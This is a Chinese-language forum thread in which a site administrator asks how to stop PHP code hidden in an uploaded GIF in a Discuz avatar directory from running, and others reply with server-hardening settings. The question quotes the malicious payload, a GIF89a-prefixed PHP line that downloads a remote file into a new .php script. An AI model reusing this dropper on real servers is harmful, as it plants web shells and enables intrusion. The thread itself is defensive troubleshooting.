如何禁止服務器上的圖片中包含的這個代碼不運行？

paladinet

圖片中包含的代碼如下： GIF89a<?php copy('http://www.discuz.pub/dama.txt','123asx.php');
請教，如何讓這個不運行!!!

我知道答案 回答被采納將會獲得1 貢獻 已有8人回答

jet

我的也是，

Failure

什么環境下？

老周部落

1. 請問木馬文件被上傳到哪個目錄？

2. 如果是Windows請確認以下設置如圖所示。

登錄/注冊后可看大圖

3. 如果使用nginx，要保證php配置中cgi.fix_pathinfo = 0。

4. 如果使用php-fpm，那么設置中的security.limit_extensions只有.php。

paladinet

Failure 發表于 2020-3-18 21:17
什么環境下？

IIS + php7.3

paladinet

老周部落 發表于 2020-3-18 21:47
1. 請問木馬文件被上傳到哪個目錄？

2. 如果是Windows請確認以下設置如圖所示。

目錄： uc_server/data/avatar/下的一個目錄內

之前就是按圖設置的。

paladinet

jet 發表于 2020-3-18 21:16
我的也是，

你的解決了么？

老周部落

paladinet 發表于 2020-3-19 11:46
目錄： uc_server/data/avatar/下的一個目錄內

之前就是按圖設置的。

您現在訪問能運行么？

lookboy

前幾天我的服務器被攻擊
第一次發現病毒被偽裝成  圖片格式 隱藏在兩年前的圖片文件夾里